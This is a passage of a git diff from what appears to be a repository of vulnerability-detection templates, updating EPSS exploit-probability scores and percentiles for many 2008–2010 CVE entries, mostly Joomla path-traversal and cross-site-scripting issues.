a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-1547 cwe-id: CWE-601 epss-score: 0.03523 - epss-percentile: 0.90347 + epss-percentile: 0.90463 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index 49edb2bcba..8c5e1f0585 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-2398 cwe-id: CWE-79 epss-score: 0.00329 - epss-percentile: 0.67268 + epss-percentile: 0.67621 cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 2bcda26401..7d04249929 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-2650 cwe-id: CWE-22 epss-score: 0.06344 - epss-percentile: 0.92723 + epss-percentile: 0.92818 cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 399ae2e350..5ec6518986 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2008-4668 cwe-id: CWE-22 epss-score: 0.01018 - epss-percentile: 0.819 + epss-percentile: 0.82078 cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index be02a31acd..bcda5d3a45 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5 cve-id: CVE-2008-4764 cwe-id: CWE-22 - epss-score: 0.00779 - epss-percentile: 0.79142 + epss-score: 0.02365 + epss-percentile: 0.88581 cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index dec0852cf6..de40b9404f 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 - epss-percentile: 0.88339 + epss-percentile: 0.885 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index e14247ebdd..38cc1ec80a 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5 cve-id: CVE-2008-6080 cwe-id: CWE-22 - epss-score: 0.00666 - epss-percentile: 0.77115 + epss-score: 0.00824 + epss-percentile: 0.79986 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index f85d8602a3..057d800af3 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.8 cve-id: CVE-2008-6172 cwe-id: CWE-22 - epss-score: 0.00447 - epss-percentile: 0.71823 + epss-score: 0.00509 + epss-percentile: 0.7385 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 4ad5b672ef..a240d7fbe9 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5 cve-id: CVE-2008-6222 cwe-id: CWE-22 - epss-score: 0.00832 - epss-percentile: 0.79864 + epss-score: 0.01029 + epss-percentile: 0.82153 cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 76b25c9fbc..72d996fb39 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6465 cwe-id: CWE-79 epss-score: 0.00421 - epss-percentile: 0.70992 + epss-percentile: 0.71286 cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 7d28c73842..19af3efe44 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 - epss-percentile: 0.68648 + epss-percentile: 0.68946 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 6fe61a9a36..e397f22e29 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 - epss-percentile: 0.69519 + epss-percentile: 0.69842 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index d07f8fb1a1..cf4b31732d 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-7269 cwe-id: CWE-20 epss-score: 0.01358 - epss-percentile: 0.84524 + epss-percentile: 0.84686 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 077a9bc327..26c4f5e63a 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.8 cve-id: CVE-2009-0347 cwe-id: CWE-59 - epss-score: 0.09851 - epss-percentile: 0.94077 + epss-score: 0.10982 + epss-percentile: 0.94474 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 7931daeab2..171c212e93 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2009-0545 cwe-id: CWE-20 - epss-score: 0.9719 - epss-percentile: 0.99722 + epss-score: 0.97252 + epss-percentile: 0.99782 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 59c6109bdc..48131f89ec 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-0932 cwe-id: CWE-22 epss-score: 0.04048 - epss-percentile: 0.9095 + epss-percentile: 0.91068 cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 19cf80ee3b..7cd10be1ba 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-1151 cwe-id: CWE-94 epss-score: 0.79256 - epss-percentile: 0.9785 + epss-percentile: 0.97904 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 8c7e3ecedd..eacffce88f 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-1496 cwe-id: CWE-22 epss-score: 0.00533 - epss-percentile: 0.7415 + epss-percentile: 0.74439 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 621d69493b..f8e478e6b1 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.8 cve-id: CVE-2009-1558 cwe-id: CWE-22 - epss-score: 0.00901 - epss-percentile: 0.80705 + epss-score: 0.00883 + epss-percentile: 0.80681 cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 4ccde8be73..8794b6756c 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.3 cve-id: CVE-2009-1872 cwe-id: CWE-79 - epss-score: 0.3657 - epss-percentile: 0.96635 + epss-score: 0.40155 + epss-percentile: 0.96823 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 7da1d0d2c5..0f37615cb8 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-2015 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79614 + epss-percentile: 0.79853 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index efd4822da4..c89b6b1953 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2009-2100 cwe-id: CWE-22 epss-score: 0.00528 - epss-percentile: 0.74045 + epss-percentile: 0.7434 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 77f8c9c527..5921e677c4 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-3053 cwe-id: CWE-22 epss-score: 0.00367 - epss-percentile: 0.69025 + epss-percentile: 0.69335 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index e458678e4b..396e926fa9 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-3318 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.77913 + epss-percentile: 0.78149 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index a056354cce..f069dad378 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-4202 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87217 + epss-percentile: 0.87365 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 1d7023e9a8..d9bb27a446 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.01041 - epss-percentile: 0.82106 + epss-percentile: 0.82278 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 9d47d0e5cd..7ec0bb01cb 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-4679 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 136b2f76e8..53c2d7da5c 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2009-5020 cwe-id: CWE-20 epss-score: 0.00215 - epss-percentile: 0.58808 + epss-percentile: 0.59201 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 468484b262..3a6a6bef7a 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-5114 cwe-id: CWE-22 epss-score: 0.03309 - epss-percentile: 0.90068 + epss-percentile: 0.90208 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 4387e6bef7..ca32c0a5d3 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-0157 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79783 + epss-percentile: 0.80013 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index a264be8142..68af872042 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2010-0219 cwe-id: CWE-255 - epss-score: 0.97513 - epss-percentile: 0.99971 + epss-score: 0.975 + epss-percentile: 0.99972 cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index d9c63a2666..d7aef6d345 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.0586 - epss-percentile: 0.92444 + epss-percentile: 0.92548 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index d56a13d928..2a8bd0d37d 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5 cve-id: CVE-2010-0696 cwe-id: CWE-22 - epss-score: 0.79015 - epss-percentile: 0.97844 + epss-score: 0.69179 + epss-percentile: 0.97614 cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 356f8f51cb..93dbef1d49 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.01326 - epss-percentile: 0.84334 + epss-percentile: 0.84496 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 14f7b665fa..0e6a1f3612 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 2cfac5a06e..696505d9b4 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0943 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.8306 + epss-percentile: 0.83262 cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index fd05da7897..8e0d18a41d 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 1f7566b1a3..402a803e0d 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79614 + epss-percentile: 0.79853 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 95e78bfedb..1502ba9fe5 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-0982 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.80286 + epss-percentile: 0.8051 cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 876879408c..bf8205cc7a 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83609 + epss-percentile: 0.83787 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index c18d4f94b9..c3acf7b2d8 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1056 cwe-id: CWE-22 epss-score: 0.06484 - epss-percentile: 0.92801 + epss-percentile: 0.929 cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 4a6961094a..b174531434 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5 cve-id: CVE-2010-1081 cwe-id: CWE-22 - epss-score: 0.02282 - epss-percentile: 0.88237 + epss-score: 0.0168 + epss-percentile: 0.86231 cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 74078c9f09..01b8b784af 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1217 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.8306 + epss-percentile: 0.83262 cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index d199908f5f..e1a28df7af 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79614 + epss-percentile: 0.79853 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index f87a80beed..96b6c69ccc 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1302 cwe-id: CWE-22 epss-score: 0.01204 - epss-percentile: 0.83479 + epss-percentile: 0.83658 cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 9e106a3906..9a7d18caed 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1304 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.71928 + epss-percentile: 0.72239 cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 684a1965c8..5ea0c65399 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1305 cwe-id: CWE-22 epss-score: 0.03203 - epss-percentile: 0.89919 + epss-percentile: 0.90066 cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index eb484f39f1..80657f0d68 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83796 + epss-percentile: 0.83956 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 746c9ae464..b3ecf6328e 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86395 + epss-percentile: 0.86515 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 4dcd078cc5..452114679c 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.01334 - epss-percentile: 0.84366 + epss-percentile: 0.84527 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 75dabb124e..467ddcc5f3 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.8306 + epss-percentile: 0.83262 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index c1b8c445b8..c0ed556d04 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.71928 + epss-percentile: 0.72239 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 463dc69efc..bf62bd250b 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 6afc40fd4a..a4d2b5f723 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1315 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.80286 + epss-percentile: 0.8051 cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 1454f31ec2..06d759f8fc 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1340 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.8306 + epss-percentile: 0.83262 cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index d8967d0bab..b72dc71760 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1345 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 96840d095a..c1d33bb9ad 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1352 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.72681 + epss-percentile: 0.72989 cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git 